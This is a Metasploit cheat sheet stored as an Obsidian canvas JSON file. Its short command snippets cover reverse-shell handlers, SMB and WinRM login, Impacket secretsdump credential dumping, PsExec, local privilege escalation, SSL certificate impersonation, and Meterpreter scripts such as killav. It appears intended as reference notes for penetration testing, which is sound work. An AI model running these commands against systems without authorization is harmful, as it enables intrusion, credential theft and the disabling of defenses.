{
	"nodes":[
		{"id":"18061a4d81434c3c","type":"group","x":-1120,"y":-1120,"width":1020,"height":1000,"color":"3","label":"Core"},
		{"id":"cadf04f00b3be9d1","x":500,"y":-422,"width":520,"height":1274,"color":"6","type":"group","label":"Modules - Post"},
		{"id":"389d5fa443add925","type":"group","x":-40,"y":-1120,"width":1060,"height":571,"color":"5","label":"Modules - Auxiliary"},
		{"id":"6e603975d8a84393","x":-580,"y":-8,"width":520,"height":860,"color":"4","type":"group","label":"Plugins"},
		{"id":"ef9dcabe82f4707a","x":-1127,"y":-8,"width":517,"height":860,"color":"#57610a","type":"group","label":"Meterpreter"},
		{"id":"d1aeddacc1ac407a","type":"group","x":-35,"y":240,"width":515,"height":612,"color":"2","label":"Database"},
		{"id":"562c68137ecaacee","x":-35,"y":-422,"width":515,"height":565,"color":"#fe0101","type":"group","label":"Modules - Privilege Escalation"},
		{"id":"9d2aee89cd2d623f","type":"text","text":"#### Search\n```ruby\nmsf> search platform:windows port:135 target:XP type:exploit\n#list available keywords\nmsf>help search\n```","x":-580,"y":-1100,"width":460,"height":220},
		{"id":"b54932bbfc935f7b","type":"text","text":"##### Modules\n```ruby\n#navigate through different active modules\nuse exploit/multi/handler\n#push module on stack\npushm\nuse ...\n#list stack\nlistm\n[*] Module stack:\n[1]     post/multi/recon/local_exploit_suggester\n[0]     exploit/multi/handler\n#go to previous module and delete it from the stack\npopm\n```","x":-1100,"y":-1100,"width":520,"height":410},
		{"id":"7679085e8ee1127c","type":"text","text":"##### Jobs\n```ruby\n#List Jobs\njobs -l\n#Kill all Jobs\njobs -K\n#Kill single Job by ID\njobs -k 1\n```","x":-1100,"y":-690,"width":520,"height":290},
		{"id":"31a6a0497ace252b","type":"text","text":"#### Run in Background\n```ruby\nuse exploit/multi/handler\nrun -p windows/shell/reverse_tcp lhost=0.0.0.0 lport=443 -j\n```","x":-580,"y":-880,"width":460,"height":190},
		{"id":"277ac50a9e4ede58","type":"text","text":"#### RHosts\n```ruby\nset RHOSTS file:/home/user/iplist.txt\n```","x":-580,"y":-690,"width":460,"height":170},
		{"id":"306b7249677620f2","type":"text","text":"#### Impacket Secretsdump\n```ruby\nuse scanner/smb/impacket/secretsdump\nset RHOSTS 192.168.1.1\nset SMBDOMAIN domain\nset SMBUSER user\nset SMBPASS pass\n```","x":-20,"y":-1092,"width":480,"height":262},
		{"id":"a6a95aa767733abd","type":"text","text":"#### SMB Login\n```ruby\nuse scanner/smb/smb_login\nauxiliary(scanner/smb/smb_login) > run CreateSession=true RHOSTS=172.14.2.164 RPORT=445 SMBDomain=windomain.local SMBPass=password SMBUser=username\nsessions -i 1\n```","x":-20,"y":-830,"width":477,"height":261},
		{"id":"6b700acca31a0a7e","type":"text","text":"#### Custom SSL\nRun [[#impersonate_ssl]] Module and configure the handler:\n```ruby\nset HandlerSSLCert /home/path/cert.pem\nset StagerVerifySSLCert true\nrun\n```","x":-1100,"y":-400,"width":520,"height":262},
		{"id":"c9397db32548c1ac","type":"text","text":"#### Sessions\n```ruby\n#List Sessions\nsessions\n#Select Session\nsessions -i 1\n```","x":-580,"y":-520,"width":460,"height":382},
		{"id":"5b597ffff9721743","type":"text","text":"#### Service\n```ruby\nuse exploit/windows/local/service_permissions\nrun lhost=0.0.0.0 lport=12222\n```","x":-15,"y":-402,"width":477,"height":262},
		{"id":"c45418657b7e297f","type":"text","text":"#### Modules\nList all modules\n```ruby\nload -l\n```\nRun module\n```ruby\nmeterpreter > run scriptname\n```","x":-1107,"y":12,"width":477,"height":320},
		{"id":"af0dcaf40d63dffe","type":"text","text":"| Scriptname        | Action                            |\n| ----------------- | --------------------------------- |\n| checkvm           | check if target system is a VM    |\n| getcountermeasure | checks security settings          |\n| getgui            | try to enable RDP                 |\n| get_local_subnets | list local subnets                |\n| gettelnet         | enable telnet                     |\n| hostsedit         | edit the hosts file               |\n| killav            | try to kill antivirus             |\n| remotewinenum     | enumerate system information      |\n| scraper           | enumerate more system information |\n| winenum           | detailed windows enumeration      |","x":-1107,"y":332,"width":477,"height":500},
		{"id":"755b6c33d765535e","x":-15,"y":-138,"width":477,"height":262,"type":"text","text":"#### UAC Enumeration\n```ruby\nuse post/windows/gather/win_privs\nset SESSION 1\n```"},
		{"id":"030225a7b9b99cde","type":"text","text":"#### Local Exploit Suggester\n```ruby\nuse post/multi/recon/local_exploit_suggester\nset SESSION 1\n```","x":520,"y":-402,"width":477,"height":262},
		{"id":"88a1f77abac4c8e6","x":520,"y":-140,"width":477,"height":262,"type":"text","text":"#### PsExec\n```ruby\nuse exploit/windows/smb/psexec\nset rhost 127.0.0.1\nset smbuser mega-admin\nset smbpass p4ss\nrun\n```"},
		{"id":"8a40847a8ecee769","type":"text","text":"#### Upgrade Shell to Meterpreter\n```ruby\nuse post/multi/manage/shell_to_meterpreter\nset SESSION 1\n```","x":520,"y":122,"width":477,"height":262},
		{"id":"5010a8af230b7b77","type":"text","text":"#### WinRM Login\n```ruby\nuse scanner/winrm/winrm_login\nrun CreateSession=true RHOSTS=172.14.2.164 SMBDomain=windomain.local SMBPass=password SMBUser=username\n```","x":517,"y":-830,"width":480,"height":261},
		{"id":"7fccaa65d5ebabae","type":"text","text":"#### Impersonate SSL\n```ruby\nuse auxiliary/gather/impersonate_ssl\nset RHOSTS www.google.com\nset ADD_CN true\nset ADD_SAN true\nrun\n```","x":520,"y":-1092,"width":477,"height":262},
		{"id":"6afa3c1f19aa94dc","type":"text","text":"#### Alias\n```ruby\nload alias\nalias s set\nalias sg setg\n```","x":-560,"y":14,"width":477,"height":262},
		{"id":"fe3f1349bbbeba0d","type":"text","text":"#### Wiki\n```ruby\nload wiki\nWiki Commands\n=============\ndokuwiki          Outputs data from the current workspace in dokuwiki markup.\nmediawiki         Outputs data from the current workspace in mediawiki markup.\n```","x":-560,"y":276,"width":477,"height":284},
		{"id":"b7639bdb1a9d5bd4","type":"text","text":"Initialize a database with `msfdb init`. A database with user and password will be generated.","x":-15,"y":260,"width":477,"height":100},
		{"id":"c8e7045e10f69ab2","type":"text","text":"#### Database nmap\n```ruby\nmsf6 > db_connect user:pass@localhost/msf\nmsf6 > db_status\nmsf6 > workspace\nmsf6 > workspace -a new_ws\nmsf6 > db_nmap -sP 192.168.2.0/24\nmsf6 > hosts\nmsf6 > use auxiliary/scanner/portscan/tcp\nmsf6 auxiliary(scanner/portscan/tcp) > hosts -R\nmsf6 auxiliary(scanner/portscan/tcp) > run\n```","x":-15,"y":360,"width":477,"height":320},
		{"id":"86fde74a24322b91","type":"text","text":"","x":520,"y":418,"width":477,"height":262}
	],
	"edges":[]
}